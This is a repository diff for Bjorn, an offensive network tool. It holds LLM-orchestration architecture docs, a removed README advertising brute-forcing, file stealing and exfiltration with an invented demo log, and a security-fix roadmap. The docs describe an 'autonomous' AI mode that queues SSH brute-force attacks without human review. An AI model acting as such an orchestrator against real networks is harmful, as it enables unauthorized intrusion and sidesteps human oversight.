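def has_actionable_change(prev, cur):
    """True only if at least one counter increased; decreases alone never trigger a cycle."""
    if prev is None:
        return True  # first cycle always runs
    return any(c > p for p, c in zip(prev, cur))

# Hosts going offline (12 -> 10) is not actionable; a new vuln (3 -> 4) is.
```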
### LLM priorities vs queue
```python
_ADVISOR_PRIORITY = 85 # advisor > MCP(80) > normal(50) > scheduler(40)
_AUTONOMOUS_PRIORITY = 82 # autonomous slightly below advisor
```
### Autonomous system prompt — example
```
"You are Bjorn's autonomous orchestrator, running on a Raspberry Pi network security tool.
Current state: 12 hosts discovered, 3 vulnerabilities, 1 credential.
Operation mode: ATTACK. Hard limit: at most 3 run_action calls per cycle.
Only these action names may be queued: NmapScan, SSHBruteforce, SMBScan.
Strategy: prioritise unexplored services, hosts with high port counts, and hosts with no recent scans.
Do not queue duplicate actions already pending or recently successful.
Use Norse references occasionally. Be terse and tactical."
```
### Advisor response format
```json
// Action recommended:
{"action": "NmapScan", "target_ip": "192.168.1.42", "reason": "unexplored host, 0 open ports known"}
// Nothing to do:
{"action": null}
```
### Reasoning log
When `llm_orchestrator_log_reasoning = True`:
- Full reasoning is logged via `logger.info("[LLM_ORCH_REASONING]...")`
- It is also injected into the `"llm_orchestrator"` session in `LLMBridge._chat_histories`
- Viewable in real time in `chat.html` via the **Orch Log** button
---
## 6. Orchestrator & Scheduler integration
### `orchestrator.py`
```python
# __init__
self.llm_orchestrator = None
self._init_llm_orchestrator()
# _init_llm_orchestrator()
if shared_data.config.get("llm_enabled") and shared_data.config.get("llm_orchestrator_mode") != "none":
from llm_orchestrator import LLMOrchestrator
self.llm_orchestrator = LLMOrchestrator(shared_data)
self.llm_orchestrator.start()
# run() — each iteration
self._sync_llm_orchestrator() # starts/stops thread according to runtime config
# _process_background_tasks()
if self.llm_orchestrator and mode == "advisor":
self.llm_orchestrator.advise()
```
### `action_scheduler.py` — skip option
```python
# In run(), each iteration:
_llm_skip = bool(
shared_data.config.get("llm_orchestrator_skip_scheduler", False)
and shared_data.config.get("llm_orchestrator_mode") == "autonomous"
and shared_data.config.get("llm_enabled", False)
)
if not _llm_skip:
self._publish_all_upcoming() # step 2: publish due actions
self._evaluate_global_actions() # step 3: global evaluation
self.evaluate_all_triggers() # step 4: per-host triggers
# Steps 1 (promote due) and 5 (cleanup/priorities) always run
```
When `llm_orchestrator_skip_scheduler = True` + `mode = autonomous` + `llm_enabled = True`:
- The scheduler no longer publishes automatic actions (no more `B_require`, `B_trigger`, etc.)
- The autonomous LLM becomes **sole master of the queue**
- Queue hygiene (promotions, cleanup) remains active
---
## 7. Web Utils LLM (`web_utils/llm_utils.py`)
Follows the exact **same pattern** as all other `web_utils` (constructor `__init__(self, shared_data)`, methods called by `webapp.py`).
### Methods
| Method | Type | Description |
|--------|------|-------------|
| `get_llm_status(handler)` | GET | LLM bridge state (active backend, LaRuche URL…) |
| `get_llm_config(handler)` | GET | Current LLM config (api_key masked) |
| `get_llm_reasoning(handler)` | GET | `llm_orchestrator` session history (reasoning log) |
| `handle_chat(data)` | POST | Sends a message, returns LLM response |
| `clear_chat_history(data)` | POST | Clears a session's history |
| `get_mcp_status(handler)` | GET | MCP server state (running, port, transport) |
| `toggle_mcp(data)` | POST | Enables/disables MCP server + saves config |
| `save_mcp_config(data)` | POST | Saves MCP config (tools, port, transport) |
| `save_llm_config(data)` | POST | Saves LLM config (all parameters) |
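The shared `web_utils` shape, reduced to its essentials (an illustrative skeleton, not the real class body):

```python
import json

class LLMUtils:
    """Same pattern as every other web_utils class: shared_data in, JSON out."""

    def __init__(self, shared_data):
        self.shared_data = shared_data

    def get_llm_status(self, handler):
        # GET handlers receive the HTTP handler and write the response themselves.
        payload = {"enabled": bool(self.shared_data.config.get("llm_enabled", False))}
        body = json.dumps(payload).encode()
        handler.send_response(200)
        handler.send_header("Content-Type", "application/json")
        handler.end_headers()
        handler.wfile.write(body)

    def handle_chat(self, data):
        # POST handlers receive the decoded JSON body and return a dict.
        if not data.get("message"):
            return {"status": "error", "message": "empty message"}
        return {"status": "ok", "response": "...", "session_id": data.get("session_id", "default")}
```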
---
## 8. EPD comment integration (`comment.py`)
### Behaviour before modification
```
get_comment(status, lang, params)
└── if delay elapsed OR status changed
└── _pick_text(status, lang, params) ← SQLite DB
└── returns weighted text
```
### Behaviour after modification
```
get_comment(status, lang, params)
└── if delay elapsed OR status changed
├── [if llm_comments_enabled = True]
│ └── LLMBridge().generate_comment(status, params)
│ ├── success → LLM text (≤12 words, ~8s max)
│ └── failure/timeout → text = None
└── [if text = None] ← SYSTEMATIC FALLBACK
└── _pick_text(status, lang, params) ← original behaviour
└── returns weighted DB text
```
**Original behaviour preserved 100% if LLM disabled or failing.**
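The fallback chain above boils down to this (a sketch with hypothetical function parameters; the real logic sits in `comment.py`):

```python
def get_comment_text(status, lang, params, llm_generate, pick_text, llm_enabled):
    """Try the LLM first when enabled; fall back to the weighted DB text whenever it yields nothing."""
    text = None
    if llm_enabled:
        try:
            text = llm_generate(status, params)  # returns None on failure/timeout
        except Exception:
            text = None  # any LLM error degrades silently
    if text is None:
        text = pick_text(status, lang, params)  # original weighted-DB behaviour
    return text
```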
---
## 9. Configuration (`shared.py`)
### LLM Bridge section (`__title_llm__`)
| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `llm_enabled` | `False` | bool | **Master toggle** — activates the entire bridge |
| `llm_comments_enabled` | `False` | bool | Use LLM for EPD comments |
| `llm_chat_enabled` | `True` | bool | Enable /chat.html interface |
| `llm_chat_tools_enabled` | `False` | bool | Enable tool-calling in web chat |
| `llm_backend` | `"auto"` | str | `auto` \| `laruche` \| `ollama` \| `api` |
| `llm_laruche_discovery` | `True` | bool | Auto-discover LaRuche nodes via mDNS |
| `llm_laruche_url` | `""` | str | Manual LaRuche URL (overrides discovery) |
| `llm_ollama_url` | `"http://127.0.0.1:11434"` | str | Local Ollama URL |
| `llm_ollama_model` | `"phi3:mini"` | str | Ollama model to use |
| `llm_api_provider` | `"anthropic"` | str | `anthropic` \| `openai` \| `openrouter` |
| `llm_api_key` | `""` | str | API key (masked in UI) |
| `llm_api_model` | `"claude-haiku-4-5-20251001"` | str | External API model |
| `llm_api_base_url` | `""` | str | Custom base URL (OpenRouter, proxy…) |
| `llm_timeout_s` | `30` | int | Global LLM call timeout (seconds) |
| `llm_max_tokens` | `500` | int | Max tokens for chat |
| `llm_comment_max_tokens` | `80` | int | Max tokens for EPD comments |
| `llm_chat_history_size` | `20` | int | Max messages per chat session |
### MCP Server section (`__title_mcp__`)
| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `mcp_enabled` | `False` | bool | Enable MCP server |
| `mcp_transport` | `"http"` | str | `http` (SSE) \| `stdio` |
| `mcp_port` | `8765` | int | HTTP SSE port |
| `mcp_allowed_tools` | `[all]` | list | List of authorised MCP tools |
### LLM Orchestrator section (`__title_llm_orch__`)
| Key | Default | Type | Description |
|-----|---------|------|-------------|
| `llm_orchestrator_mode` | `"none"` | str | `none` \| `advisor` \| `autonomous` |
| `llm_orchestrator_interval_s` | `60` | int | Delay between autonomous cycles (min 30s) |
| `llm_orchestrator_max_actions` | `3` | int | Max actions per autonomous cycle |
| `llm_orchestrator_allowed_actions` | `[]` | list | Actions the LLM may queue (empty = mcp_allowed_tools) |
| `llm_orchestrator_skip_scheduler` | `False` | bool | Disable scheduler when autonomous is active |
| `llm_orchestrator_skip_if_no_change` | `True` | bool | Skip cycle if fingerprint unchanged |
| `llm_orchestrator_log_reasoning` | `False` | bool | Log full LLM reasoning |
---
## 10. HTTP Routes (`webapp.py`)
### GET routes
| Route | Handler | Description |
|-------|---------|-------------|
| `GET /api/llm/status` | `llm_utils.get_llm_status` | LLM bridge state |
| `GET /api/llm/config` | `llm_utils.get_llm_config` | LLM config (api_key masked) |
| `GET /api/llm/reasoning` | `llm_utils.get_llm_reasoning` | Orchestrator reasoning log |
| `GET /api/mcp/status` | `llm_utils.get_mcp_status` | MCP server state |
### POST routes (JSON data-only)
| Route | Handler | Description |
|-------|---------|-------------|
| `POST /api/llm/chat` | `llm_utils.handle_chat` | Send a message to the LLM |
| `POST /api/llm/clear_history` | `llm_utils.clear_chat_history` | Clear a session's history |
| `POST /api/llm/config` | `llm_utils.save_llm_config` | Save LLM config |
| `POST /api/mcp/toggle` | `llm_utils.toggle_mcp` | Enable/disable MCP |
| `POST /api/mcp/config` | `llm_utils.save_mcp_config` | Save MCP config |
All routes respect Bjorn's existing authentication (`webauth`).
---
## 11. Web interfaces
### `/chat.html`
Terminal-style chat interface (black/red, consistent with Bjorn).
**Features:**
- Auto-detects LLM state on load (`GET /api/llm/status`)
- Displays active backend (LaRuche URL, or mode)
- "Bjorn is thinking..." indicator during response
- Unique session ID per browser tab
- `Enter` = send, `Shift+Enter` = new line
- Textarea auto-resize
- **"Clear history"** button — clears server-side session
- **"Orch Log"** button — loads the autonomous orchestrator's reasoning
- Calls `GET /api/llm/reasoning`
- Renders each message (cycle prompt + LLM response) as chat bubbles
- "← Back to chat" to return to normal chat
- Helper message if log is empty (hint: enable `llm_orchestrator_log_reasoning`)
**Access:** `http://[bjorn-ip]:8000/chat.html`
### `/mcp-config.html`
Full LLM & MCP configuration page.
**LLM Bridge section:**
- Master enable/disable toggle
- EPD comments, chat, chat tool-calling toggles
- Backend selector (auto / laruche / ollama / api)
- LaRuche mDNS discovery toggle + manual URL
- Ollama configuration (URL + model)
- External API configuration (provider, key, model, custom URL)
- Timeout and token parameters
- "TEST CONNECTION" button
**MCP Server section:**
- Enable toggle with live start/stop
- Transport selector (HTTP SSE / stdio)
- HTTP port
- Per-tool checkboxes
- "RUNNING" / "OFF" indicator
**Access:** `http://[bjorn-ip]:8000/mcp-config.html`
---
## 12. Startup (`Bjorn.py`)
```python
# LLM Bridge — warm up singleton
try:
from llm_bridge import LLMBridge
LLMBridge() # Starts mDNS discovery if llm_laruche_discovery=True
logger.info("LLM Bridge initialised")
except Exception as e:
logger.warning("LLM Bridge init skipped: %s", e)
# MCP Server
try:
import mcp_server
if shared_data.config.get("mcp_enabled", False):
mcp_server.start() # Daemon thread "MCPServer"
logger.info("MCP server started")
else:
logger.info("MCP server loaded (disabled)")
except Exception as e:
logger.warning("MCP server init skipped: %s", e)
```
The LLM Orchestrator is initialised inside `orchestrator.py` (not `Bjorn.py`), since it depends on the orchestrator loop cycle.
---
## 13. LaRuche / LAND Protocol compatibility
### LAND Protocol
LAND (Local AI Network Discovery) is the LaRuche protocol:
- **Discovery:** mDNS service type `_ai-inference._tcp.local.`
- **Inference:** `POST http://[node]:8419/infer`
### What Bjorn implements on the Python side
```python
# mDNS listening (zeroconf)
from zeroconf import Zeroconf, ServiceBrowser
ServiceBrowser(zc, "_ai-inference._tcp.local.", listener)
# → Auto-detects LaRuche nodes
# Inference call (urllib stdlib, zero dependency)
payload = {"prompt": "...", "capability": "llm", "max_tokens": 500}
req = urllib.request.Request(
    f"{url}/infer",
    data=json.dumps(payload).encode(),          # urlopen requires bytes, not str
    headers={"Content-Type": "application/json"},
)
urllib.request.urlopen(req, timeout=30)
```
### Scenarios
| Scenario | Behaviour |
|----------|-----------|
| LaRuche node detected on LAN | Used automatically as priority backend |
| Multiple LaRuche nodes | First discovered is used |
| Manual URL configured | Used directly, discovery ignored |
| LaRuche node absent | Cascades to Ollama or external API |
| `zeroconf` not installed | Discovery silently disabled, DEBUG log |
---
## 14. Optional dependencies
| Package | Min version | Feature unlocked | Install command |
|---------|------------|------------------|----------------|
| `mcp[cli]` | ≥ 1.0.0 | Full MCP server | `pip install "mcp[cli]"` |
| `zeroconf` | ≥ 0.131.0 | LaRuche mDNS discovery | `pip install zeroconf` |
**No new dependencies** added for LLM backends:
- **LaRuche / Ollama**: uses `urllib.request` (Python stdlib)
- **Anthropic / OpenAI**: REST API via `urllib` — no SDK needed
---
## 15. Quick activation & configuration
### Basic LLM chat
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-H "Content-Type: application/json" \
-d '{"llm_enabled": true, "llm_backend": "ollama", "llm_ollama_model": "phi3:mini"}'
# → http://[bjorn-ip]:8000/chat.html
```
### Chat with tool-calling (LLM accesses live network data)
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{"llm_enabled": true, "llm_chat_tools_enabled": true}'
```
### LLM Orchestrator — advisor mode
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{
"llm_enabled": true,
"llm_orchestrator_mode": "advisor",
"llm_orchestrator_allowed_actions": ["NmapScan", "SSHBruteforce"]
}'
```
### LLM Orchestrator — autonomous mode (LLM as sole planner)
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{
"llm_enabled": true,
"llm_orchestrator_mode": "autonomous",
"llm_orchestrator_skip_scheduler": true,
"llm_orchestrator_max_actions": 5,
"llm_orchestrator_interval_s": 120,
"llm_orchestrator_allowed_actions": ["NmapScan", "SSHBruteforce", "SMBScan"],
"llm_orchestrator_log_reasoning": true
}'
# → View reasoning: http://[bjorn-ip]:8000/chat.html → Orch Log button
```
### With Anthropic API
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{
"llm_enabled": true,
"llm_backend": "api",
"llm_api_provider": "anthropic",
"llm_api_key": "sk-ant-...",
"llm_api_model": "claude-haiku-4-5-20251001"
}'
```
### With OpenRouter (access to all models)
```bash
curl -X POST http://[bjorn-ip]:8000/api/llm/config \
-d '{
"llm_enabled": true,
"llm_backend": "api",
"llm_api_provider": "openrouter",
"llm_api_key": "sk-or-...",
"llm_api_model": "meta-llama/llama-3.2-3b-instruct",
"llm_api_base_url": "https://openrouter.ai/api"
}'
```
### Model recommendations by scenario
| Scenario | Backend | Recommended model | Pi RAM |
|----------|---------|-------------------|--------|
| Autonomous orchestrator + LaRuche on LAN | laruche | Mistral/Phi on the node | 0 (remote inference) |
| Autonomous orchestrator offline | ollama | `qwen2.5:3b` | ~3 GB |
| Autonomous orchestrator cloud | api | `claude-haiku-4-5-20251001` | 0 |
| Chat + tools | ollama | `phi3:mini` | ~2 GB |
| EPD comments only | ollama | `smollm2:360m` | ~400 MB |
---
## 16. Complete API endpoint reference
### GET
```
GET /api/llm/status
→ {"enabled": bool, "backend": str, "laruche_url": str|null,
"laruche_discovery": bool, "ollama_url": str, "ollama_model": str,
"api_provider": str, "api_model": str, "api_key_set": bool}
GET /api/llm/config
→ {all llm_* keys except api_key, + "llm_api_key_set": bool}
GET /api/llm/reasoning
→ {"status": "ok", "messages": [{"role": str, "content": str}, ...], "count": int}
→ {"status": "error", "message": str, "messages": [], "count": 0}
GET /api/mcp/status
→ {"enabled": bool, "running": bool, "transport": str,
"port": int, "allowed_tools": [str]}
```
### POST
```
POST /api/llm/chat
Body: {"message": str, "session_id": str?}
→ {"status": "ok", "response": str, "session_id": str}
→ {"status": "error", "message": str}
POST /api/llm/clear_history
Body: {"session_id": str?}
→ {"status": "ok"}
POST /api/llm/config
Body: {any subset of llm_* and llm_orchestrator_* keys}
→ {"status": "ok"}
→ {"status": "error", "message": str}
POST /api/mcp/toggle
Body: {"enabled": bool}
→ {"status": "ok", "enabled": bool, "started": bool?}
POST /api/mcp/config
Body: {"allowed_tools": [str]?, "port": int?, "transport": str?}
→ {"status": "ok", "config": {...}}
```
---
## 17. Queue priority system
```
Priority Source Trigger
──────────────────────────────────────────────────────────────
85 LLM Advisor llm_orchestrator.advise()
82 LLM Autonomous _run_autonomous_cycle() via run_action tool
80 External MCP _impl_run_action() via MCP client or chat
50 Normal / manual queue_action() without explicit priority
40 Scheduler action_scheduler evaluates triggers
```
The scheduler always processes the highest-priority pending item first. LLM and MCP actions therefore preempt scheduler actions.
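The selection rule can be stated as a one-liner (sketch; the real implementation queries the DB):

```python
def next_pending(queue):
    """Pick the item the orchestrator would run next: highest priority, then FIFO by queue id."""
    return min(queue, key=lambda item: (-item["priority"], item["id"]))

queue = [
    {"id": 1, "priority": 40, "trigger": "scheduler"},
    {"id": 2, "priority": 80, "trigger": "mcp"},
    {"id": 3, "priority": 85, "trigger": "llm_advisor"},
]
```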
---
## 18. Fallbacks & graceful degradation
| Condition | Behaviour |
|-----------|-----------|
| `llm_enabled = False` | `complete()` returns `None` immediately — zero overhead |
| `llm_orchestrator_mode = "none"` | LLMOrchestrator not instantiated |
| `mcp` not installed | `_build_mcp_server()` returns `None`, WARNING log |
| `zeroconf` not installed | LaRuche discovery silently disabled, DEBUG log |
| LaRuche node timeout | Exception caught, cascade to next backend |
| Ollama not running | `URLError` caught, cascade to API |
| API key missing | `_call_api()` returns `None`, cascade |
| All backends fail | `complete()` returns `None` |
| LLM returns `None` for EPD | `comment.py` uses `_pick_text()` (original behaviour) |
| LLM advisor: invalid JSON | DEBUG log, returns `None`, next cycle |
| LLM advisor: disallowed action | WARNING log, ignored |
| LLM autonomous: no change | cycle skipped, zero API call |
| LLM autonomous: ≥6 tool turns | returns partial text + warning |
| Exception in LLM Bridge | `try/except` at every level, DEBUG log |
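The cascade pattern the table describes reduces to a simple loop (illustrative sketch; the backend callables are placeholders):

```python
def complete_with_fallback(prompt, backends, enabled=True):
    """Try each backend in order; any exception or empty result cascades; None if all fail."""
    if not enabled:
        return None  # llm_enabled = False -> zero overhead
    for call in backends:  # e.g. [laruche, ollama, api]
        try:
            text = call(prompt)
            if text:
                return text
        except Exception:
            continue  # timeout / URLError / missing key -> next backend
    return None
```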
### Timeouts
```
Chat / complete() → llm_timeout_s (default: 30s)
EPD comments → 8s (hardcoded, short to avoid blocking render)
Autonomous cycle → 90s (long: may chain multiple tool calls)
Advisor → 20s (short prompt + JSON response)
```
---
## 19. Call sequences
### Web chat with tool-calling
```
Browser → POST /api/llm/chat {"message": "which hosts are vulnerable?"}
└── LLMUtils.handle_chat(data)
└── LLMBridge().chat(message, session_id)
└── complete(messages, system, tools=_BJORN_TOOLS)
└── _call_anthropic(messages, tools=[...])
├── POST /v1/messages → stop_reason=tool_use
│ └── tool: get_hosts(alive_only=true)
│ → _execute_tool → _impl_get_hosts()
│ → JSON of hosts
├── POST /v1/messages [+ tool result] → end_turn
└── returns "3 exposed SSH hosts: 192.168.1.10, ..."
← {"status": "ok", "response": "3 exposed SSH hosts..."}
```
### LLM autonomous cycle
```
Thread "LLMOrchestrator" (daemon, interval=60s)
└── _run_autonomous_cycle()
├── fp = _compute_fingerprint() → (12, 3, 1, 47)
├── _has_actionable_change(fp) → True (vuln_count 2→3)
├── self._last_fingerprint = fp
└── LLMBridge().complete(prompt, system, tools=[read-only + run_action])
└── _call_anthropic(tools=[...])
├── POST → tool_use: get_hosts()
│ → [{ip: "192.168.1.20", ports: "22,80,443"}]
├── POST → tool_use: get_action_history()
│ → [...]
├── POST → tool_use: run_action("SSHBruteforce", "192.168.1.20")
│ → _execute_tool → _impl_run_action()
│ → db.queue_action(priority=82, trigger="llm_autonomous")
│ → queue_event.set()
└── POST → end_turn
→ "Queued SSHBruteforce on 192.168.1.20 (Mjolnir strikes the unguarded gate)"
→ [if log_reasoning=True] logger.info("[LLM_ORCH_REASONING]...")
→ [if log_reasoning=True] _push_to_chat(bridge, prompt, response)
```
### Reading reasoning from chat.html
```
User clicks "Orch Log"
└── fetch GET /api/llm/reasoning
└── LLMUtils.get_llm_reasoning(handler)
└── LLMBridge()._chat_histories["llm_orchestrator"]
→ [{"role": "user", "content": "[Autonomous cycle]..."},
{"role": "assistant", "content": "Queued SSHBruteforce..."}]
← {"status": "ok", "messages": [...], "count": 2}
→ Rendered as chat bubbles in #messages
```
### MCP from external client (Claude Desktop)
```
Claude Desktop → tool_call: run_action("NmapScan", "192.168.1.0/24")
└── FastMCP dispatch
└── mcp_server.run_action(action_name, target_ip)
└── _impl_run_action()
├── db.queue_action(priority=80, trigger="mcp")
└── queue_event.set()
← {"status": "queued", "action": "NmapScan", "target": "192.168.1.0/24", "priority": 80}
```
### EPD comment with LLM
```
display.py → CommentAI.get_comment("SSHBruteforce", params={...})
└── delay elapsed OR status changed → proceed
├── llm_comments_enabled = True ?
│ └── LLMBridge().generate_comment("SSHBruteforce", params)
│ └── complete([{role:user, content:"Status: SSHBruteforce..."}],
│ max_tokens=80, timeout=8)
│ ├── LaRuche → "Norse gods smell SSH credentials..." ✓
│ └── [or timeout 8s] → None
└── text = None → _pick_text("SSHBruteforce", lang, params)
└── SELECT FROM comments WHERE status='SSHBruteforce'
→ "Processing authentication attempts..."
```

---
### README.md (removed, 179 lines)
# <img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="33"> Bjorn
![Python](https://img.shields.io/badge/Python-3776AB?logo=python&logoColor=fff)
![Status](https://img.shields.io/badge/Status-Development-blue.svg)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Reddit](https://img.shields.io/badge/Reddit-Bjorn__CyberViking-orange?style=for-the-badge&logo=reddit)](https://www.reddit.com/r/Bjorn_CyberViking)
[![Discord](https://img.shields.io/badge/Discord-Join%20Us-7289DA?style=for-the-badge&logo=discord)](https://discord.com/invite/B3ZH9taVfT)
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="150">
<img src="https://github.com/user-attachments/assets/1b490f07-f28e-4418-8d41-14f1492890c6" alt="bjorn_epd-removebg-preview" width="150">
</p>
Bjorn is a "Tamagotchi-like", sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT. This document provides a detailed explanation of the project.
## 📚 Table of Contents
- [Introduction](#-introduction)
- [Features](#-features)
- [Getting Started](#-getting-started)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage Example](#-usage-example)
- [Contributing](#-contributing)
- [License](#-license)
- [Contact](#-contact)
## 📄 Introduction
Bjorn is a powerful tool designed to perform comprehensive network scanning, vulnerability assessment, and data exfiltration. Its modular design and extensive configuration options allow for flexible and targeted operations. By combining different actions and orchestrating them intelligently, Bjorn can provide valuable insights into network security and help identify and mitigate potential risks.
The e-Paper HAT display and web interface make it easy to monitor and interact with Bjorn, providing real-time updates and status information. With its extensible architecture and customizable actions, Bjorn can be adapted to suit a wide range of security testing and monitoring needs.
## 🌟 Features
- **Network Scanning**: Identifies live hosts and open ports on the network.
- **Vulnerability Assessment**: Performs vulnerability scans using Nmap and other tools.
- **System Attacks**: Conducts brute-force attacks on various services (FTP, SSH, SMB, RDP, Telnet, SQL).
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
[![Architecture](https://img.shields.io/badge/ARCHITECTURE-Read_Docs-ff69b4?style=for-the-badge&logo=github)](./ARCHITECTURE.md)
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started
## 📌 Prerequisites
### 📋 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📋 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
I did not develop Bjorn for the Raspberry Pi Zero 2 W (64-bit), but several user reports confirm that the installation works perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment, the e-Paper screen versions V2 and V4 have been tested and implemented.
The V1 and V3 will hopefully work the same.
### 🔨 Installation
The fastest way to install Bjorn is the automatic installation script:
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh && sudo ./install_bjorn.sh
# Choose option 1 for automatic installation. It may take a while, as many packages and modules will be installed. You must reboot at the end.
```
For **detailed information** about the **installation** process, see the [Install Guide](INSTALL.md).
## ⚡ Quick Start
**Need help? Struggling to find Bjorn's IP after installation?**
Use my Bjorn Detector & SSH Launcher:
[https://github.com/infinition/bjorn-detector](https://github.com/infinition/bjorn-detector)
![ezgif-1-a310f5fe8f](https://github.com/user-attachments/assets/182f82f0-5c3a-48a9-a75e-37b9cfa2263a)
**Hmm, still need help?**
For **detailed information** about **troubleshooting**, see [Troubleshooting](TROUBLESHOOTING.md).
**Quick Installation**: see [Getting Started](#-getting-started) for the fastest way to install **Bjorn**.
## 💡 Usage Example
Here's a demonstration of how Bjorn autonomously hunts through your network like a Viking raider (fake demo for illustration):
```bash
# Reconnaissance Phase
[NetworkScanner] Discovering alive hosts...
[+] Host found: 192.168.1.100
├── Ports: 22,80,445,3306
└── MAC: 00:11:22:33:44:55
# Attack Sequence
[NmapVulnScanner] Found vulnerabilities on 192.168.1.100
├── MySQL 5.5 < 5.7 - User Enumeration
└── SMB - EternalBlue Candidate
[SSHBruteforce] Cracking credentials...
[+] Success! user:password123
[StealFilesSSH] Extracting sensitive data...
# Automated Data Exfiltration
[SQLBruteforce] Database accessed!
[StealDataSQL] Dumping tables...
[SMBBruteforce] Share accessible
[+] Found config files, credentials, backups...
```
This is just a demo output - actual results will vary based on your network and target configuration.
All discovered data is automatically organized in the data/output/ directory, viewable through both the e-Paper display (as indicators) and web interface.
Bjorn works tirelessly, expanding its network knowledge base and growing stronger with each discovery.
No constant monitoring needed - just deploy and let Bjorn do what it does best: hunt for vulnerabilities.
🔧 Expand Bjorn's Arsenal!
Bjorn is designed to be a community-driven weapon forge. Create and share your own attack modules!
⚠️ **For educational and authorized testing purposes only** ⚠️
## 🤝 Contributing
The project welcomes contributions in:
- New attack modules.
- Bug fixes.
- Documentation.
- Feature improvements.
For **detailed information** about the **contributing** process, see the [Contributing Docs](CONTRIBUTING.md), [Code of Conduct](CODE_OF_CONDUCT.md) and [Development Guide](DEVELOPMENT.md).
## 📫 Contact
- **Report Issues**: Via GitHub.
- **Guidelines**:
- Follow ethical guidelines.
- Document reproduction steps.
- Provide logs and context.
- **Author**: __infinition__
- **GitHub**: [infinition/Bjorn](https://github.com/infinition/Bjorn)
## 🌠 Stargazers
[![Star History Chart](https://api.star-history.com/svg?repos=infinition/bjorn&type=Date)](https://star-history.com/#infinition/bjorn&Date)
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

---
### ROADMAP.md (new file, 315 lines)
# BJORN Cyberviking — Roadmap & Changelog
> Comprehensive audit-driven roadmap for the v2 release.
> Each section tracks scope, status, and implementation notes.
---
## Legend
| Tag | Meaning |
|-----|---------|
| `[DONE]` | Implemented and verified |
| `[WIP]` | Work in progress |
| `[TODO]` | Not yet started |
| `[DROPPED]` | Descoped / won't fix |
---
## P0 — Security & Blockers (Must-fix before release)
### SEC-01: Shell injection in system_utils.py `[DONE]`
- **File:** `web_utils/system_utils.py`
- **Issue:** `subprocess.Popen(command, shell=True)` on reboot, shutdown, restart, clear_logs
- **Fix:** Replace all `shell=True` calls with argument lists (`["sudo", "reboot"]`)
- **Risk:** Command injection if any parameter is ever user-controlled
### SEC-02: Path traversal in DELETE route `[DONE]`
- **File:** `webapp.py:497-498`
- **Issue:** MAC address extracted from URL path with no validation — `self.path.split(...)[-1]`
- **Fix:** URL-decode and validate MAC format with regex before passing to handler
### SEC-03: Path traversal in file operations `[DONE]`
- **File:** `web_utils/file_utils.py`
- **Issue:** `move_file`, `rename_file`, `delete_file` accept paths from POST body.
Path validation uses `startswith()` which can be bypassed (symlinks, encoding).
- **Fix:** Use `os.path.realpath()` instead of `os.path.abspath()` for canonicalization.
Add explicit path validation helper used by all file ops.
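A canonicalising guard along those lines might look like this (a sketch; the helper name and error handling are assumptions):

```python
import os

def resolve_inside(root: str, user_path: str) -> str:
    """Canonicalise with realpath (which follows symlinks) and refuse escapes from root."""
    base = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath is escape-proof where startswith() is not ("/data" vs "/data2").
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the allowed root")
    return candidate
```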
### SEC-04: Cortex secrets committed to repo `[DONE]`
- **Files:** `bjorn-cortex/Cortex/security_config.json`, `server_config.json`
- **Issue:** JWT secret, TOTP secret, admin password hash, device API key in git
- **Fix:** Replaced with clearly-marked placeholder values + WARNING field, already in `.gitignore`
### SEC-05: Cortex WebSocket without auth `[DONE]`
- **File:** `bjorn-cortex/Cortex/server.py`
- **Issue:** `/ws/logs` endpoint has no authentication — anyone can see training logs
- **Fix:** Added `_verify_ws_token()` — JWT via query param or first message, close 4401 on failure
### SEC-06: Cortex device API auth disabled by default `[DONE]`
- **File:** `bjorn-cortex/Cortex/server_config.json`
- **Issue:** `allow_device_api_without_auth: true` + empty `device_api_key`
- **Fix:** Default to `false`, placeholder API key, CORS origins via `CORS_ORIGINS` env var
---
## P0 — Bluetooth Fixes
### BT-01: Bare except clauses `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:225,258`
- **Issue:** `except:` swallows all exceptions including SystemExit, KeyboardInterrupt
- **Fix:** Replace with `except (dbus.exceptions.DBusException, Exception) as e:` with logging
### BT-02: Null address passed to BT functions `[DONE]`
- **File:** `webapp.py:210-214`
- **Issue:** `d.get('address')` can return None, passed directly to BT methods
- **Fix:** Add null check + early return with error in each lambda/BT method entry point
